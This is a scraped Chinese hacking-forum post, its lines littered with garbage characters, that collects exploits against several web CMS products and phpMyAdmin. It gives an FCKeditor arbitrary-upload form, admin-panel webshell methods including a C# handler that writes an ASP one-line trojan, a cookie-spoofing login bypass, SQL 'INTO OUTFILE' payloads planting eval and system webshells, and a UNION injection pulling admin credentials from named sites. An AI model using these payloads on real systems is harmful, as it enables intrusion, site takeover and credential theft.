$ W$ k: K. K% V7 h m! }YxShop易想购物商城4.7.1版本任意文件上传漏洞
. k9 Y( Y2 K, y( p: t
6 \ K6 I0 g9 S W/ | L: Jhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx& ~9 B( h6 d/ j7 L1 }3 y6 p: m
跳转到网站根目录上传任意文件。" L; a0 Y3 I _( O8 {
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
: A* C7 l, ?6 c" R" t8 s<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
9 _, {6 J: }0 r% b, a: f O, HUpload a new file:<br>
$ x5 x1 `$ T( t. r8 ~<input type="file" name="NewFile" size="50"><br>
( G+ Q: K7 U, Y3 C0 A" g<input id="btnUpload" type="submit" value="Upload">4 C$ M$ u5 `' g
</form>
7 q4 T2 d& n* ?0 k7 Z5 N8 k-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 S5 ?( K3 }+ M) @3 }! d+ P2 p
2 l/ D X# w. z; NSDcms 后台拿webshell
% E1 A5 A2 P: }. P/ I: K3 n7 a) g
5 M0 x5 [2 `6 K+ Z0 m% j, F1 T第一种方法:
# H) m! c3 W: s进入后台-->系统管理-->系统设置-->系统设置->网站名称;6 y0 s& {/ H- P! x+ H! b, s
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx( c2 H) A: [0 G1 C, ?
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
& w" q1 K7 ]& p5 y第二种方法:
7 |. q4 V3 Q" j* z" z2 l' q进入后台-->系统管理-->系统设置-->系统设置->上传设置;0 |. y+ b" j1 {9 k% E
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!3 H" l2 s; x0 I) Y G/ W
第三种方法:; g& v% r1 C0 f0 E N! o
进入后台-->界面管理-->模板文件管理-->创建文件 j" ?6 v# h( X6 V3 j
文件名写入getshell.ashx
% X: @2 {! R' W5 _& R5 x J# p& s内容写入下面内容:
+ y$ h% M. Q$ R& T" Q) J/====================复制下面的=========================/" }/ S- D# I* |4 r- C& D( T; H* G
<%@ WebHandler Language="C#" Class="Handler" %>
3 C* I! J% B. B4 e5 J z1 ausing System;
# F$ T1 P& z6 dusing System.Web;, o1 T" A" m" L- y. t2 g$ _
using System.IO;( Q v7 a! |) p* f. b3 R9 q
public class Handler : IHttpHandler {
* N. t$ Y2 @1 b7 o- g0 Hpublic void ProcessRequest (HttpContext context) {
9 h% E; f) h+ ]. [ Econtext.Response.ContentType = "text/plain";
: b i# \8 _- [0 f1 l4 B" XStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));+ ~8 L) N) q( @& N% [
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");* z' ^" u. ^7 Y# U
file1.Flush();8 |; R( T9 r8 ?' Q: s* d5 Z
file1.Close();$ L \$ G3 B( \7 {1 X# A+ r8 K
}7 M4 m1 z% ^# C
public bool IsReusable {
6 s/ Y5 L# S3 \# O3 Dget {- h$ m; V# A/ g* L d
return false;
! C7 w4 H1 A. _}
6 ]0 N5 y: D1 a: M- L, f9 F0 l}
9 W; P4 ^0 S. s/ d: i/ I}
# l O, s6 _/ w. Y/=============================================/! T' W' ~- |& d
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
) x9 l# O' ]+ U0 ^) u1 B. u会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
# m0 a# f! _' H9 E2 h6 F8 a5 V+ [-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" C% R2 O% ?8 x( A6 ]
: T" i8 J9 f0 l% I# p/ }+ y9 vESCMS网站管理系统0day
4 b7 I$ C# K' ~7 _8 S2 b" D
; L0 g ~+ a" L! D" F+ C后台登陆验证是通过admin/check.asp实现的9 l/ K# {4 I$ b$ k c7 V
; w; v3 J& E# z7 }8 R: \3 z
首先我们打开http://target.com/admin/es_index.html' u2 y' g# S K7 w( f* L! T. J
然后在COOKIE结尾加上
v! w2 G: T. M; ESCMS$_SP2=ES_admin=st0p;' |0 |! [; j3 y7 e: R. W
修改,然后刷新
], ]5 r: P8 _/ G4 W& l进后台了嘎..5 I+ a! @: }& g# P
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL8 {# Z& U# q% x' b- H
$ A/ w. k. \' C1 \9 a+ x
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
5 ~! n/ o8 ?6 }( Q" p. j" w嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp, S# K6 z/ Y4 s7 K+ g! D% a( ^
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..2 w" v/ ?& n9 y [- n4 N
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
; f, X3 X3 j+ Z% k, O------------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 G- a: V( S) @! m
/ a6 ~* p" e. j6 g宁志网站管理系统后台无验证漏洞及修复
5 B5 J4 D# `$ O; N3 m
: O" p: B4 w# e2 x Z, T网上搜了一下,好像没有发布.如有雷同纯粹巧合!
8 J+ m" F8 X# m& b9 ~官方网站:www.ningzhi.net7 S g' L- O) a& l3 t
学校网站管理系统 V.2011版本
# N; _5 Y/ g9 Y1 E/ I/ G# [) x5 M {http://down.chinaz.com/soft/29943.htm * ~+ y, q2 T, A
其它版本(如:政府版等),自行下载.2 ^/ A4 Q5 A$ n' A4 v- ?; d
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~/ L: T6 h+ i- H& L8 \
login.asp代码如下:% V6 W6 g4 F r# \: ~- d" b
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
% |. ~8 |6 ?( W# P7 Z X* Y3 z0 lmanage.asp代码我就不帖出来了.反正也没验证.( d2 A8 L; B: ~8 g3 Q% t1 Z2 p. w
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!. m3 Z& H+ d7 E* w8 b4 Z/ B" e% ~
漏洞利用:
7 R' X3 r( @# l. w直接访问http://www.0855.tv/admin/manage.asp+ r8 M5 \; |& Y
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5/ d, |4 z( k. ~; d3 _0 T5 S
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ e) r3 Z$ p" D" K4 J
7 s' E, ` i6 G" [3 M/ P+ Cphpmyadmin拿shell的四种方法总结及修复% l# M+ o7 P' n$ `' l
1 Y8 P' v: H1 B8 D U4 a+ Q
方法一:0 Q! Y; g* a7 i
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
; F3 ~; h+ F" {( p' w, O7 XINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
4 g: t+ R/ B( |0 m4 p4 I) VSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
) n& j; G: B3 V* C0 G----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php8 Z, i4 {* v" L8 k2 u3 Y: @( T0 d
一句话连接密码:7on
1 l L* ?" [3 W# R0 b方法二:' W; f3 Q) B0 L8 k* s+ j' K
读取文件内容: select load_file('E:/xamp/www/s.php');! F9 j; S5 f2 V9 V) L
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
R4 N+ X4 Y: M# B ecmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'6 {" q5 _ f) a. J0 H/ n9 J6 H
方法三:
' `, X' |( l% @% QJhackJ版本 PHPmyadmin拿shell
+ m7 ?# n9 |$ M* {Create TABLE study (cmd text NOT NULL);
; H; M% V' d, m! Z3 n4 p gInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
! R/ ^# a8 u- jselect cmd from study into outfile 'E:/wamp/www/7.php';
' f7 o! r+ k E5 p0 l. v& l- CDrop TABLE IF EXISTS study;+ @% n. r/ w& l. f7 b
<?php eval($_POST[cmd])?>
4 N7 [" G c" y" P+ \- u; a+ ICREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
7 W @( d$ Z" o. v$ tINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1' Q- f4 _ Y8 g2 {. v" X/ a$ R
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 15 ?0 L% _5 X& d5 ^* L! n
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
7 ], K j% C( P2 o$ I5 H% G8 Y6 l- Z方法四:* l! K9 J ]1 k/ ]6 [+ k' q
select load_file('E:/xamp/www/study.php');
! \, w% c; m1 a3 Y1 D$ P, N" ]9 tselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'$ ~) Y. @2 c% T0 L( { o; P
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
( \1 V! t0 |7 }/ N7 C-----------------------------------------------------------------------------------------------------------------------------------------------------------------------. A# \& @" |2 ?" R, p7 c7 l5 ]# R
4 ^# E! [8 F) Q- N' q7 dNO.001中学网站管理系统 Build 110628 注入漏洞
" l% \7 O3 g6 p
0 j2 B; u8 ^( F+ N' ]+ HNO.001中学网站管理系统功能模块:
+ z: U- |* g) U1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等0 p" ]* i6 J* S4 ]9 n' Z5 v
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
( L$ G/ O' n2 x1 l3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息. T8 P* ~$ p& A; I
4.视频图片管理:一级分类,动态添加视频或者图片等信息- R6 f/ ~* Q# E* R6 p3 Q
5.留言管理:对留言,修改,删除、回复等管理
2 h" C9 B9 F1 l* \$ K6.校友频道:包括校友资料excel导出、管理等功能
% ^8 e2 c' F, p& S$ C# z7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
6 ^9 Q% a0 t! T# z默认后台:admin/login.asp
* ]) ?5 z& r9 G; Z/ f% z9 l2 J官方演示:http://demo.001cms.net
$ f: A: C$ g- Z& _* P源码下载地址:http://down.chinaz.com/soft/30187.htm; |* X* y5 o( I! t
EXP:$ i/ |0 i+ q D" F' X
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
9 h5 K4 _! ]/ Q% F5 U测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin2 |1 y( G2 g! _& ?/ q' L3 p( @5 g% {
getshell:后台有备份,你懂的- C5 K8 `9 G6 E$ e
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
0 H! d. Q+ Q2 j------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对